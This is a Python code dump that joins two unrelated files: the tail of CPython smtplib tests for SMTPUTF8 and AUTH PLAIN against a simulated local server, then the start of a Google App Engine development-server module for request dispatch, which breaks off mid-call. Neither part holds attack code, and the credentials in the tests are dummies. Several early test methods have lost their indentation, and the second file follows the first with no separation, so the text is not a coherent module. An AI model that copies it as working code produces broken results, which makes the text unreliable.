self.serv = SimSMTPUTF8Server((HOST, 0), ('nowhere', -1),
decode_data=False,
enable_SMTPUTF8=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def test_test_server_supports_extensions(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertTrue(smtp.has_extn('smtputf8'))
def test_send_unicode_with_SMTPUTF8_via_sendmail(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.sendmail('Jőhn', 'Sálly', m,
mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertEqual(self.serv.last_mailfrom, 'Jőhn')
self.assertEqual(self.serv.last_rcpttos, ['Sálly'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_unicode_with_SMTPUTF8_via_low_level_API(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertEqual(
smtp.mail('Jő', options=['BODY=8BITMIME', 'SMTPUTF8']),
(250, b'OK'))
self.assertEqual(smtp.rcpt('János'), (250, b'OK'))
self.assertEqual(smtp.data(m), (250, b'OK'))
self.assertEqual(self.serv.last_mailfrom, 'Jő')
self.assertEqual(self.serv.last_rcpttos, ['János'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
    def test_send_message_uses_smtputf8_if_addrs_non_ascii(self):
        # send_message() must automatically select the SMTPUTF8/8BITMIME
        # options when any envelope address contains non-ASCII characters.
        msg = EmailMessage()
        msg['From'] = "Páolo <főo@bar.com>"
        msg['To'] = 'Dinsdale'
        msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
        # XXX I don't know why I need two \n's here, but this is an existing
        # bug (if it is one) and not a problem with the new functionality.
        msg.set_content("oh là là, know what I mean, know what I mean?\n\n")
        # XXX smtpd converts received /r/n to /n, so we can't easily test that
        # we are successfully sending /r/n :(.
        expected = textwrap.dedent("""\
            From: Páolo <főo@bar.com>
            To: Dinsdale
            Subject: Nudge nudge, wink, wink \u1F609
            Content-Type: text/plain; charset="utf-8"
            Content-Transfer-Encoding: 8bit
            MIME-Version: 1.0

            oh là là, know what I mean, know what I mean?
            """)
        smtp = smtplib.SMTP(
            HOST, self.port, local_hostname='localhost', timeout=3)
        self.addCleanup(smtp.close)
        self.assertEqual(smtp.send_message(msg), {})
        self.assertEqual(self.serv.last_mailfrom, 'főo@bar.com')
        self.assertEqual(self.serv.last_rcpttos, ['Dinsdale'])
        self.assertEqual(self.serv.last_message.decode(), expected)
        self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
        self.assertIn('SMTPUTF8', self.serv.last_mail_options)
        self.assertEqual(self.serv.last_rcpt_options, [])
# Base64-encoded AUTH PLAIN initial-response (\0user\0password) for the
# credentials 'psu'/'doesnotexist', matching what SMTP.auth_plain() sends.
EXPECTED_RESPONSE = encode_base64(b'\0psu\0doesnotexist', eol='')
class SimSMTPAUTHInitialResponseChannel(SimSMTPChannel):
    """SMTP channel accepting only AUTH PLAIN with an initial-response."""

    def smtp_AUTH(self, arg):
        # RFC 4954's AUTH command allows an optional initial-response; not
        # all AUTH methods support it (some require a challenge), but AUTH
        # PLAIN does, so exercise exactly that form here.  See issue #15014.
        tokens = arg.split()
        # Accept only "AUTH PLAIN <initial-response>" with the hard-coded
        # base64-encoded response expected by the test.
        accepted = (tokens[0].lower() == 'plain'
                    and len(tokens) == 2
                    and tokens[1] == EXPECTED_RESPONSE)
        if accepted:
            self.push('235 Ok')
        else:
            self.push('571 Bad authentication')
class SimSMTPAUTHInitialResponseServer(SimSMTPServer):
    # Serve connections with the AUTH PLAIN initial-response channel above.
    channel_class = SimSMTPAUTHInitialResponseChannel
class SMTPAUTHInitialResponseSimTests(unittest.TestCase):
    """Tests for AUTH PLAIN using an initial-response (RFC 4954)."""

    def setUp(self):
        self.thread_key = threading_setup()
        # Replace getfqdn so the test never performs a real DNS lookup.
        self.real_getfqdn = socket.getfqdn
        socket.getfqdn = mock_socket.getfqdn
        self.serv_evt = threading.Event()
        self.client_evt = threading.Event()
        # Pick a random unused port by passing 0 for the port number
        self.serv = SimSMTPAUTHInitialResponseServer(
            (HOST, 0), ('nowhere', -1), decode_data=True)
        # Keep a note of what port was assigned
        self.port = self.serv.socket.getsockname()[1]
        serv_args = (self.serv, self.serv_evt, self.client_evt)
        self.thread = threading.Thread(target=debugging_server, args=serv_args)
        self.thread.start()

        # wait until server thread has assigned a port number
        self.serv_evt.wait()
        self.serv_evt.clear()

    def tearDown(self):
        socket.getfqdn = self.real_getfqdn
        # indicate that the client is finished
        self.client_evt.set()
        # wait for the server thread to terminate
        self.serv_evt.wait()
        join_thread(self.thread)
        del self.thread
        self.doCleanups()
        threading_cleanup(*self.thread_key)

    def testAUTH_PLAIN_initial_response_login(self):
        # login() should succeed using AUTH PLAIN with an initial-response.
        self.serv.add_feature('AUTH PLAIN')
        smtp = smtplib.SMTP(HOST, self.port,
                            local_hostname='localhost', timeout=15)
        smtp.login('psu', 'doesnotexist')
        smtp.close()

    def testAUTH_PLAIN_initial_response_auth(self):
        # Calling auth() directly with auth_plain must send the
        # initial-response and be accepted with a 235 reply.
        self.serv.add_feature('AUTH PLAIN')
        smtp = smtplib.SMTP(HOST, self.port,
                            local_hostname='localhost', timeout=15)
        smtp.user = 'psu'
        smtp.password = 'doesnotexist'
        code, response = smtp.auth('plain', smtp.auth_plain)
        smtp.close()
        self.assertEqual(code, 235)
# Run the test suite when executed directly.
if __name__ == '__main__':
    unittest.main()
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Manage the lifecycle of runtime processes and dispatch requests to them."""
import collections
import cStringIO
import functools
import httplib
import logging
import math
import os
import os.path
import random
import re
import string
import threading
import time
import urllib
import urlparse
import wsgiref.headers
from google.appengine.api import api_base_pb
from google.appengine.api import apiproxy_stub_map
from google.appengine.api import appinfo
from google.appengine.api import request_info
from google.appengine.api.logservice import log_service_pb
from google.appengine.tools.devappserver2 import application_configuration
from google.appengine.tools.devappserver2 import blob_image
from google.appengine.tools.devappserver2 import blob_upload
from google.appengine.tools.devappserver2 import channel
from google.appengine.tools.devappserver2 import constants
from google.appengine.tools.devappserver2 import endpoints
from google.appengine.tools.devappserver2 import errors
from google.appengine.tools.devappserver2 import file_watcher
from google.appengine.tools.devappserver2 import go_runtime
from google.appengine.tools.devappserver2 import http_runtime_constants
from google.appengine.tools.devappserver2 import instance
from google.appengine.tools.devappserver2 import login
from google.appengine.tools.devappserver2 import php_runtime
from google.appengine.tools.devappserver2 import python_runtime
from google.appengine.tools.devappserver2 import request_rewriter
from google.appengine.tools.devappserver2 import runtime_config_pb2
from google.appengine.tools.devappserver2 import start_response_utils
from google.appengine.tools.devappserver2 import static_files_handler
from google.appengine.tools.devappserver2 import thread_executor
from google.appengine.tools.devappserver2 import url_handler
from google.appengine.tools.devappserver2 import util
from google.appengine.tools.devappserver2 import wsgi_handler
from google.appengine.tools.devappserver2 import wsgi_server
# Hex alphabets used when generating request log ids and request id hashes.
_LOWER_HEX_DIGITS = string.hexdigits.lower()
_UPPER_HEX_DIGITS = string.hexdigits.upper()
# Length of the REQUEST_ID_HASH value generated for each request.
_REQUEST_ID_HASH_LENGTH = 8

# Shared pool used to run asynchronous instance shutdowns off-thread.
_THREAD_POOL = thread_executor.ThreadExecutor()

# Configuration changes that require restarting all running instances.
_RESTART_INSTANCES_CONFIG_CHANGES = frozenset(
    [application_configuration.NORMALIZED_LIBRARIES_CHANGED,
     application_configuration.SKIP_FILES_CHANGED,
     application_configuration.NOBUILD_FILES_CHANGED,
     # The server must be restarted when the handlers change because files
     # appearing in static content handlers make them unavailable to the
     # runtime.
     application_configuration.HANDLERS_CHANGED,
     application_configuration.ENV_VARIABLES_CHANGED])

# Requests whose path matches this pattern are not written to the request log.
_REQUEST_LOGGING_BLACKLIST_RE = re.compile(
    r'^/_ah/(?:channel/(?:dev|jsapi)|img|login|upload)')

# Fake arguments for _handle_script_request for request types that don't use
# user-specified handlers.
_EMPTY_MATCH = re.match('', '')
_DUMMY_URLMAP = appinfo.URLMap(script='/')

# Seconds to wait for an instance to handle /_ah/stop before force-quitting.
_SHUTDOWN_TIMEOUT = 30
def _static_files_regex_from_handlers(handlers):
patterns = []
for url_map in handlers:
handler_type = url_map.GetHandlerType()
if url_map.application_readable:
continue
if handler_type == appinfo.STATIC_FILES:
patterns.append(r'(%s)' % url_map.upload)
elif handler_type == appinfo.STATIC_DIR:
patterns.append('(%s%s%s)' % (url_map.static_dir.rstrip(os.path.sep),
re.escape(os.path.sep), r'.*'))
return r'^%s$' % '|'.join(patterns)
class InteractiveCommandError(errors.Error):
  """Raised when an interactive command cannot be executed."""
  pass
class _ScriptHandler(url_handler.UserConfiguredURLHandler):
  """A URL handler that will cause the request to be dispatched to an instance.

  This handler is special in that it does not have a working handle() method
  since the Server's dispatch logic is used to select the appropriate Instance.
  """

  def __init__(self, url_map):
    """Initializer for _ScriptHandler.

    Args:
      url_map: An appinfo.URLMap instance containing the configuration for
          this handler.

    Raises:
      errors.InvalidAppConfigError: if the handler's url is not a valid
          regular expression.
    """
    try:
      compiled_pattern = re.compile('%s$' % url_map.url)
    except re.error as e:
      raise errors.InvalidAppConfigError(
          'invalid url %r in script handler: %s' % (url_map.url, e))
    super(_ScriptHandler, self).__init__(url_map, compiled_pattern)
    self.url_map = url_map

  def handle(self, match, environ, start_response):
    """This is a dummy method that should never be called."""
    raise NotImplementedError()
class Server(object):
  """The abstract base for all instance pool implementations."""

  def _create_instance_factory(self,
                               server_configuration):
    """Create an instance.InstanceFactory.

    Args:
      server_configuration: An application_configuration.ServerConfiguration
          instance storing the configuration data for a server.

    Returns:
      An instance.InstanceFactory subclass that can be used to create instances
      with the provided configuration.
    """
    if server_configuration.runtime == 'go':
      return go_runtime.GoRuntimeInstanceFactory(
          request_data=self._request_data,
          runtime_config_getter=self._get_runtime_config,
          server_configuration=server_configuration)
    elif server_configuration.runtime in ('python', 'python27'):
      return python_runtime.PythonRuntimeInstanceFactory(
          request_data=self._request_data,
          runtime_config_getter=self._get_runtime_config,
          server_configuration=server_configuration)
    elif server_configuration.runtime == 'php':
      return php_runtime.PHPRuntimeInstanceFactory(
          request_data=self._request_data,
          runtime_config_getter=self._get_runtime_config,
          server_configuration=server_configuration)
    else:
      assert 0, 'unknown runtime %r' % server_configuration.runtime

  def _create_url_handlers(self):
    """Constructs URLHandlers based on the server configuration.

    Returns:
      A list of url_handler.URLHandlers that can handle requests as described
      in the given configuration.
    """
    handlers = []
    # Add special URL handlers (taking precedence over user-defined handlers)
    url_pattern = '/%s$' % login.LOGIN_URL_RELATIVE
    handlers.append(wsgi_handler.WSGIHandler(login.application,
                                             url_pattern))
    url_pattern = '/%s' % blob_upload.UPLOAD_URL_PATH
    # The blobstore upload handler forwards successful requests back to self
    handlers.append(
        wsgi_handler.WSGIHandler(blob_upload.Application(self), url_pattern))
    url_pattern = '/%s' % blob_image.BLOBIMAGE_URL_PATTERN
    handlers.append(
        wsgi_handler.WSGIHandler(blob_image.Application(), url_pattern))
    url_pattern = '/%s' % channel.CHANNEL_URL_PATTERN
    handlers.append(
        wsgi_handler.WSGIHandler(channel.application, url_pattern))
    url_pattern = '/%s' % endpoints.API_SERVING_PATTERN
    handlers.append(
        wsgi_handler.WSGIHandler(
            endpoints.EndpointsDispatcher(self._dispatcher), url_pattern))

    found_start_handler = False
    found_warmup_handler = False
    # Add user-defined URL handlers
    for url_map in self._server_configuration.handlers:
      handler_type = url_map.GetHandlerType()
      if handler_type == appinfo.HANDLER_SCRIPT:
        handlers.append(_ScriptHandler(url_map))
        # Track whether a user handler already covers the lifecycle URLs so
        # the fallbacks below are only added when needed.
        if not found_start_handler and re.match('%s$' % url_map.url,
                                                '/_ah/start'):
          found_start_handler = True
        if not found_warmup_handler and re.match('%s$' % url_map.url,
                                                 '/_ah/warmup'):
          found_warmup_handler = True
      elif handler_type == appinfo.STATIC_FILES:
        handlers.append(
            static_files_handler.StaticFilesHandler(
                self._server_configuration.application_root,
                url_map))
      elif handler_type == appinfo.STATIC_DIR:
        handlers.append(
            static_files_handler.StaticDirHandler(
                self._server_configuration.application_root,
                url_map))
      else:
        assert 0, 'unexpected handler %r for %r' % (handler_type, url_map)
    # Add a handler for /_ah/start if no script handler matches.
    if not found_start_handler:
      handlers.insert(0, _ScriptHandler(self._instance_factory.START_URL_MAP))
    # Add a handler for /_ah/warmup if no script handler matches and warmup is
    # enabled.
    if (not found_warmup_handler and
        'warmup' in (self._server_configuration.inbound_services or [])):
      handlers.insert(0, _ScriptHandler(self._instance_factory.WARMUP_URL_MAP))
    return handlers

  def _get_runtime_config(self):
    """Returns the configuration for the runtime.

    Returns:
      A runtime_config_pb2.Config instance representing the configuration to be
      passed to an instance. NOTE: This does *not* include the instance_id
      field, which must be populated elsewhere.
    """
    runtime_config = runtime_config_pb2.Config()
    runtime_config.app_id = self._server_configuration.application
    runtime_config.version_id = self._server_configuration.version_id
    runtime_config.threadsafe = self._server_configuration.threadsafe or False
    runtime_config.application_root = (
        self._server_configuration.application_root)
    if not self._allow_skipped_files:
      runtime_config.skip_files = str(self._server_configuration.skip_files)
      runtime_config.static_files = _static_files_regex_from_handlers(
          self._server_configuration.handlers)
    runtime_config.api_port = self._api_port
    runtime_config.stderr_log_level = self._runtime_stderr_loglevel
    runtime_config.datacenter = 'us1'
    runtime_config.auth_domain = self._auth_domain
    for library in self._server_configuration.normalized_libraries:
      runtime_config.libraries.add(name=library.name, version=library.version)
    for key, value in (self._server_configuration.env_variables or {}).items():
      runtime_config.environ.add(key=str(key), value=str(value))

    if self._cloud_sql_config:
      runtime_config.cloud_sql_config.CopyFrom(self._cloud_sql_config)

    if self._server_configuration.runtime == 'php':
      runtime_config.php_config.php_executable_path = self._php_executable_path
      runtime_config.php_config.enable_debugger = (
          self._enable_php_remote_debugging)
    if (self._python_config and
        self._server_configuration.runtime.startswith('python')):
      runtime_config.python_config.CopyFrom(self._python_config)

    return runtime_config

  def _maybe_restart_instances(self, config_changed, file_changed):
    """Restarts instances. May avoid some restarts depending on policy.

    One of config_changed or file_changed must be True.

    Args:
      config_changed: True if the configuration for the application has changed.
      file_changed: True if any file relevant to the application has changed.
    """
    if not config_changed and not file_changed:
      return
    logging.debug('Restarting instances.')
    policy = self._instance_factory.FILE_CHANGE_INSTANCE_RESTART_POLICY
    assert policy is not None, 'FILE_CHANGE_INSTANCE_RESTART_POLICY not set'

    with self._condition:
      instances_to_quit = set()
      for inst in self._instances:
        # Config changes always force a restart; file changes restart only
        # according to the factory's restart policy.
        if (config_changed or
            (policy == instance.ALWAYS) or
            (policy == instance.AFTER_FIRST_REQUEST and inst.total_requests)):
          instances_to_quit.add(inst)
      self._instances -= instances_to_quit

    for inst in instances_to_quit:
      inst.quit(allow_async=True)

  def _handle_changes(self):
    """Handle file or configuration changes."""
    # Always check for config and file changes because checking also clears
    # pending changes.
    config_changes = self._server_configuration.check_for_updates()
    # NOTE(review): self._watcher is None when automatic_restarts is False;
    # presumably this method is only invoked when restarts are enabled —
    # confirm against callers.
    has_file_changes = self._watcher.has_changes()

    if application_configuration.HANDLERS_CHANGED in config_changes:
      handlers = self._create_url_handlers()
      with self._handler_lock:
        self._handlers = handlers

    if has_file_changes:
      self._instance_factory.files_changed()

    if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
      self._instance_factory.configuration_changed(config_changes)

    self._maybe_restart_instances(
        config_changed=bool(config_changes & _RESTART_INSTANCES_CONFIG_CHANGES),
        file_changed=has_file_changes)

  def __init__(self,
               server_configuration,
               host,
               balanced_port,
               api_port,
               auth_domain,
               runtime_stderr_loglevel,
               php_executable_path,
               enable_php_remote_debugging,
               python_config,
               cloud_sql_config,
               default_version_port,
               port_registry,
               request_data,
               dispatcher,
               max_instances,
               use_mtime_file_watcher,
               automatic_restarts,
               allow_skipped_files):
    """Initializer for Server.

    Args:
      server_configuration: An application_configuration.ServerConfiguration
          instance storing the configuration data for a server.
      host: A string containing the host that any HTTP servers should bind to
          e.g. "localhost".
      balanced_port: An int specifying the port where the balanced server for
          the pool should listen.
      api_port: The port that APIServer listens for RPC requests on.
      auth_domain: A string containing the auth domain to set in the environment
          variables.
      runtime_stderr_loglevel: An int representing the minimum logging level at
          which runtime log messages should be written to stderr. See
          devappserver2.py for possible values.
      php_executable_path: A string containing the path to PHP execution e.g.
          "/usr/bin/php-cgi".
      enable_php_remote_debugging: A boolean indicating whether the PHP
          interpreter should be started with XDebug remote debugging enabled.
      python_config: A runtime_config_pb2.PythonConfig instance containing
          Python runtime-specific configuration. If None then defaults are
          used.
      cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
          required configuration for local Google Cloud SQL development. If None
          then Cloud SQL will not be available.
      default_version_port: An int containing the port of the default version.
      port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
          with a mapping of port to Server and Instance.
      request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
          with request information for use by API stubs.
      dispatcher: A Dispatcher instance that can be used to make HTTP requests.
      max_instances: The maximum number of instances to create for this server.
          If None then there is no limit on the number of created instances.
      use_mtime_file_watcher: A bool containing whether to use mtime polling to
          monitor file changes even if other options are available on the
          current platform.
      automatic_restarts: If True then instances will be restarted when a
          file or configuration change that effects them is detected.
      allow_skipped_files: If True then all files in the application's directory
          are readable, even if they appear in a static handler or "skip_files"
          directive.
    """
    self._server_configuration = server_configuration
    self._name = server_configuration.server_name
    self._host = host
    self._api_port = api_port
    self._auth_domain = auth_domain
    self._runtime_stderr_loglevel = runtime_stderr_loglevel
    self._balanced_port = balanced_port
    self._php_executable_path = php_executable_path
    self._enable_php_remote_debugging = enable_php_remote_debugging
    self._python_config = python_config
    self._cloud_sql_config = cloud_sql_config
    self._request_data = request_data
    # _create_instance_factory() transitively calls _get_runtime_config, which
    # uses self._allow_skipped_files.
    self._allow_skipped_files = allow_skipped_files
    self._instance_factory = self._create_instance_factory(
        self._server_configuration)
    self._dispatcher = dispatcher
    self._max_instances = max_instances
    self._automatic_restarts = automatic_restarts
    self._use_mtime_file_watcher = use_mtime_file_watcher
    if self._automatic_restarts:
      self._watcher = file_watcher.get_file_watcher(
          [self._server_configuration.application_root] +
          self._instance_factory.get_restart_directories(),
          self._use_mtime_file_watcher)
    else:
      self._watcher = None
    self._handler_lock = threading.Lock()
    self._handlers = self._create_url_handlers()
    self._default_version_port = default_version_port
    self._port_registry = port_registry

    self._balanced_server = wsgi_server.WsgiServer(
        (self._host, self._balanced_port), self)
    self._quit_event = threading.Event()  # Set when quit() has been called.

  @property
  def name(self):
    """The name of the server, as defined in app.yaml.

    This value will be constant for the lifetime of the server even if the
    server configuration changes.
    """
    return self._name

  @property
  def ready(self):
    """The server is ready to handle HTTP requests."""
    return self._balanced_server.ready

  @property
  def balanced_port(self):
    """The port that the balanced HTTP server for the Server is listening on."""
    assert self._balanced_server.ready, 'balanced server not running'
    return self._balanced_server.port

  @property
  def host(self):
    """The host that the HTTP server(s) for this Server is listening on."""
    return self._host

  @property
  def balanced_address(self):
    """The address of the balanced HTTP server e.g. "localhost:8080"."""
    if self.balanced_port != 80:
      return '%s:%s' % (self.host, self.balanced_port)
    else:
      return self.host

  @property
  def max_instance_concurrent_requests(self):
    """The number of concurrent requests that each Instance can handle."""
    return self._instance_factory.max_concurrent_requests

  @property
  def server_configuration(self):
    """The application_configuration.ServerConfiguration for this server."""
    return self._server_configuration

  @property
  def supports_interactive_commands(self):
    """True if the server can evaluate arbitrary code and return the result."""
    return self._instance_factory.SUPPORTS_INTERACTIVE_REQUESTS

  def _handle_script_request(self,
                             environ,
                             start_response,
                             url_map,
                             match,
                             inst=None):
    """Handles a HTTP request that has matched a script handler.

    NOTE(review): callers in _handle_request additionally pass request_id and
    request_type keyword arguments via functools.partial — concrete overrides
    must accept them; confirm subclass signatures.

    Args:
      environ: An environ dict for the request as defined in PEP-333.
      start_response: A function with semantics defined in PEP-333.
      url_map: An appinfo.URLMap instance containing the configuration for the
          handler that matched.
      match: A re.MatchObject containing the result of the matched URL pattern.
      inst: The Instance to send the request to. If None then an appropriate
          Instance will be chosen.

    Returns:
      An iterable over strings containing the body of the HTTP response.
    """
    raise NotImplementedError()

  def _no_handler_for_request(self, environ, start_response, request_id):
    """Handle a HTTP request that does not match any user-defined handlers."""
    self._insert_log_message('No handlers matched this URL.', 2, request_id)
    start_response('404 Not Found', [('Content-Type', 'text/plain')])
    return ['The url "%s" does not match any handlers.' % environ['PATH_INFO']]

  def _error_response(self, environ, start_response, status):
    """Start an empty-bodied HTTP error response with the given status code."""
    start_response('%d %s' % (status, httplib.responses[status]), [])
    return []

  def _handle_request(self, environ, start_response, inst=None,
                      request_type=instance.NORMAL_REQUEST):
    """Handles a HTTP request.

    Args:
      environ: An environ dict for the request as defined in PEP-333.
      start_response: A function with semantics defined in PEP-333.
      inst: The Instance to send the request to. If None then an appropriate
          Instance will be chosen. Setting inst is not meaningful if the
          request does not match a "script" handler.
      request_type: The type of the request. See instance.*_REQUEST module
          constants.

    Returns:
      An iterable over strings containing the body of the HTTP response.
    """
    # NOTE(review): this fork reports the NGINX_PORT environment variable as
    # the server port instead of the balanced port — confirm NGINX_PORT is
    # always set in this deployment before relying on it.
    environ['SERVER_PORT'] = os.environ['NGINX_PORT']
    if 'HTTP_HOST' in environ:
      environ['SERVER_NAME'] = environ['HTTP_HOST'].split(':', 1)[0]
    environ['DEFAULT_VERSION_HOSTNAME'] = '%s:%s' % (
        environ['SERVER_NAME'], os.environ['NGINX_PORT'])

    with self._request_data.request(
        environ,
        self._server_configuration) as request_id:
      # Requests on the logging blacklist (e.g. /_ah/login) are not logged.
      should_log_request = not _REQUEST_LOGGING_BLACKLIST_RE.match(
          environ['PATH_INFO'])
      environ['REQUEST_ID_HASH'] = self.generate_request_id_hash()
      if should_log_request:
        environ['REQUEST_LOG_ID'] = self.generate_request_log_id()
        if 'HTTP_HOST' in environ:
          hostname = environ['HTTP_HOST']
        elif environ['SERVER_PORT'] == '80':
          hostname = environ['SERVER_NAME']
        else:
          hostname = '%s:%s' % (environ['SERVER_NAME'],
                                environ['SERVER_PORT'])

        if environ.get('QUERY_STRING'):
          resource = '%s?%s' % (urllib.quote(environ['PATH_INFO']),
                                environ['QUERY_STRING'])
        else:
          resource = urllib.quote(environ['PATH_INFO'])
        email, _, _ = login.get_user_info(environ.get('HTTP_COOKIE', ''))
        method = environ.get('REQUEST_METHOD', 'GET')
        http_version = environ.get('SERVER_PROTOCOL', 'HTTP/1.0')

        logservice = apiproxy_stub_map.apiproxy.GetStub('logservice')
        logservice.start_request(
            request_id=request_id,
            user_request_id=environ['REQUEST_LOG_ID'],
            ip=environ.get('REMOTE_ADDR', ''),
            app_id=self._server_configuration.application,
            version_id=self._server_configuration.version_id,
            nickname=email.split('@', 1)[0],
            user_agent=environ.get('HTTP_USER_AGENT', ''),
            host=hostname,
            method=method,
            resource=resource,
            http_version=http_version)

      def wrapped_start_response(status, response_headers, exc_info=None):
        # Tag every response with the dev server's Server header and, when
        # logging is enabled for this request, finalize the request log.
        response_headers.append(('Server',
                                 http_runtime_constants.SERVER_SOFTWARE))
        if should_log_request:
          headers = wsgiref.headers.Headers(response_headers)
          status_code = int(status.split(' ', 1)[0])
          content_length = int(headers.get('Content-Length', 0))
          logservice.end_request(request_id, status_code, content_length)
          logging.info('%(server_name)s: '
                       '"%(method)s %(resource)s %(http_version)s" '
                       '%(status)d %(content_length)s',
                       {'server_name': self.name,
                        'method': method,
                        'resource': resource,
                        'http_version': http_version,
                        'status': status_code,
                        'content_length': content_length or '-'})
        return start_response(status, response_headers, exc_info)

      if (environ['REQUEST_METHOD'] in ('GET', 'HEAD', 'TRACE') and
          int(environ.get('CONTENT_LENGTH') or '0') != 0):
        # CONTENT_LENGTH may be empty or absent.
        wrapped_start_response('400 Bad Request', [])
        return ['"%s" requests may not contain bodies.' %
                environ['REQUEST_METHOD']]

      with self._handler_lock:
        handlers = self._handlers
      try:
        request_url = environ['PATH_INFO']
        # Background/interactive/shutdown requests bypass the URL handlers
        # and go straight to the instance with dummy handler arguments.
        if request_type in (instance.BACKGROUND_REQUEST,
                            instance.INTERACTIVE_REQUEST,
                            instance.SHUTDOWN_REQUEST):
          app = functools.partial(self._handle_script_request,
                                  url_map=_DUMMY_URLMAP,
                                  match=_EMPTY_MATCH,
                                  request_id=request_id,
                                  inst=inst,
                                  request_type=request_type)
          return request_rewriter.frontend_rewriter_middleware(app)(
              environ, wrapped_start_response)
        for handler in handlers:
          match = handler.match(request_url)
          if match:
            auth_failure = handler.handle_authorization(environ,
                                                        wrapped_start_response)
            if auth_failure is not None:
              return auth_failure

            if isinstance(handler, _ScriptHandler):
              app = functools.partial(self._handle_script_request,
                                      url_map=handler.url_map,
                                      match=match,
                                      request_id=request_id,
                                      inst=inst,
                                      request_type=request_type)
              return request_rewriter.frontend_rewriter_middleware(app)(
                  environ, wrapped_start_response)
            else:
              return handler.handle(match, environ, wrapped_start_response)
        return self._no_handler_for_request(environ, wrapped_start_response,
                                            request_id)
      except StandardError, e:
        logging.exception('Request to %r failed', request_url)
        wrapped_start_response('500 Internal Server Error', [], e)
        return []

  def _async_shutdown_instance(self, inst, port):
    """Shut down inst asynchronously on the shared thread pool."""
    _THREAD_POOL.submit(self._shutdown_instance, inst, port)

  def _shutdown_instance(self, inst, port):
    """Send /_ah/stop to inst, then force-quit it after _SHUTDOWN_TIMEOUT."""
    force_shutdown_time = time.time() + _SHUTDOWN_TIMEOUT
    try:
      environ = self.build_request_environ(
          'GET', '/_ah/stop', [], '', '0.1.0.3', port, fake_login=True)
      self._handle_request(environ,
                           start_response_utils.null_start_response,
                           inst=inst,
                           request_type=instance.SHUTDOWN_REQUEST)
      logging.debug('Sent shutdown request: %s', inst)
    except:
      # Best-effort: shutdown must proceed even if the stop request fails.
      logging.exception('Internal error while handling shutdown request.')
    finally:
      time_to_wait = force_shutdown_time - time.time()
      self._quit_event.wait(time_to_wait)
      inst.quit(force=True)

  def _insert_log_message(self, message, level, request_id):
    """Append an app log line to the request log via the logservice stub."""
    logs_group = log_service_pb.UserAppLogGroup()
    log_line = logs_group.add_log_line()
    log_line.set_timestamp_usec(int(time.time() * 1e6))
    log_line.set_level(level)
    log_line.set_message(message)
    request = log_service_pb.FlushRequest()
    request.set_logs(logs_group.Encode())
    response = api_base_pb.VoidProto()
    logservice = apiproxy_stub_map.apiproxy.GetStub('logservice')
    logservice._Dynamic_Flush(request, response, request_id)

  @staticmethod
  def generate_request_log_id():
    """Generate a random REQUEST_LOG_ID.

    Returns:
      A string suitable for use as a REQUEST_LOG_ID. The returned string is
      variable length to emulate the production values, which encapsulate
      the application id, version and some log state.
    """
    return ''.join(random.choice(_LOWER_HEX_DIGITS)
                   for _ in range(random.randrange(30, 100)))

  @staticmethod
  def generate_request_id_hash():
    """Generate a random REQUEST_ID_HASH."""
    return ''.join(random.choice(_UPPER_HEX_DIGITS)
                   for _ in range(_REQUEST_ID_HASH_LENGTH))

  def set_num_instances(self, instances):
    """Sets the number of instances for this server to run.

    Args:
      instances: An int containing the number of instances to run.

    Raises:
      request_info.NotSupportedWithAutoScalingError: always, for this base.
    """
    raise request_info.NotSupportedWithAutoScalingError()

  def get_num_instances(self):
    """Returns the number of instances for this server to run."""
    raise request_info.NotSupportedWithAutoScalingError()

  def suspend(self):
    """Stops the server from serving requests."""
    raise request_info.NotSupportedWithAutoScalingError()

  def resume(self):
    """Restarts the server."""
    raise request_info.NotSupportedWithAutoScalingError()

  def get_instance_address(self, instance_id):
    """Returns the address of the HTTP server for an instance."""
    return '%s:%s' % (self.host, self.get_instance_port(instance_id))

  def get_instance_port(self, instance_id):
    """Returns the port of the HTTP server for an instance."""
    raise request_info.NotSupportedWithAutoScalingError()

  def get_instance(self, instance_id):
    """Returns the instance with the provided instance ID."""
    raise request_info.NotSupportedWithAutoScalingError()

  @property
  def supports_individually_addressable_instances(self):
    # Auto-scaled pools do not expose per-instance addresses by default.
    return False

  def create_interactive_command_server(self):
    """Returns a InteractiveCommandServer that can be sent user commands."""
    if self._instance_factory.SUPPORTS_INTERACTIVE_REQUESTS:
      return InteractiveCommandServer(self._server_configuration,
                                      self._host,
                                      self._balanced_port,
                                      self._api_port,
                                      self._auth_domain,
                                      self._runtime_stderr_loglevel,
